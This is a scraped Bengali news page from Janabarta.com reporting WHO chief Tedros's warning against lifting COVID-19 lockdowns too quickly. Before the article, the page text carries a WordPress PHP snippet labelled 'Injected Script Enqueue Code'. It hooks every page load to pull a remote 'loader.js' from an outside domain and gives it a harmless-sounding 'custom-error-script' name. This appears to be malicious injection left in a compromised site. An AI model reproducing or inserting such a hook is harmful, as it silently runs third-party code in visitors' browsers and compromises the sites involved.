// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site তাড়াহুড়ো করে লকডাউন প্রত্যাহার নয় : বিশ্ব স্বাস্থ্য সংস্থা - Janabarta.com

তাড়াহুড়ো করে লকডাউন প্রত্যাহার নয় : বিশ্ব স্বাস্থ্য সংস্থা

আন্তর্জাতিক ডেস্ক: মহামারি করোনাভাইরাস ঠেকাতে লকডাউনসহ নানামুখী পদক্ষেপ গ্রহণ করেছে পুরো বিশ্ব। চীন, স্পেন, ইতালি ও মার্কিন যুক্তরাষ্ট্র কিছু কিছু ক্ষেত্রে লকডাউন তোলার কথা ভাবছে। এমন সময় বিশ্ব স্বাস্থ্য সংস্থা (হু) জানিয়েছে এ ধরনের সিদ্ধান্ত নেওয়ার ক্ষেত্রে তাড়াহুড়ো করলে চলবে না। ধীরে-সুস্থে সিদ্ধান্ত নিতে হবে।

এ বিষয়ে হু’র মহাপরিচালক টেড্রোস আধানম ঘেব্রেইসুস বলেন, ‘কোভিড-১৯ খুবই দ্রুত ছড়ায় এবং তা কমতে অনেক বেশি সময় লাগে। যদি সঠিক জনস্বাস্থ্য ব্যবস্থা নেওয়া যায় তাহলে করোনাভাইরাসের বিস্তার ঠেকানোর পদেক্ষেপ ধীরে ধীরে তুলে ফেলা যেতে পারে।’

সোমবার জেনেভায় এক ভিডিও সংবাদ সম্মেলনে তিনি এসব কথা বলেন। খবর তুরস্কের সংবাদমাধ্যম অ্যানাদুলু এজেন্সির।

মার্কিন যুক্তরাষ্ট্র সহ ইউরোপের বেশকিছু দেশ করোনাভাইরাসকে কেন্দ্র করে আরোপিত লকডাউন সহজতর করার ব্যাপারে ভাবতে শুরু করেছে। তবে তা সাবধানতার সাথে করা ভালো বলে জানায় বিশ্ব স্বাস্থ্য সংস্থা।

এ বিষয়ে টেড্রস বলেন, `এর মানে হলো পদক্ষেপ তুলে নেওয়া যেতে পারে। তবে তা অবশ্যই সতর্কতার সাথে করতে হবে। একসাথে তুলে ফেলা যাবে না।’

তিনি শারীরিক দূরত্ব বজায় রাখাসহ অন্যান্য জরুরি জনস্বাস্থ্য ব্যবস্থা নেওয়ার প্রতি গুরুত্ব আরোপ করার কথা পুনরায় ব্যক্ত করেন।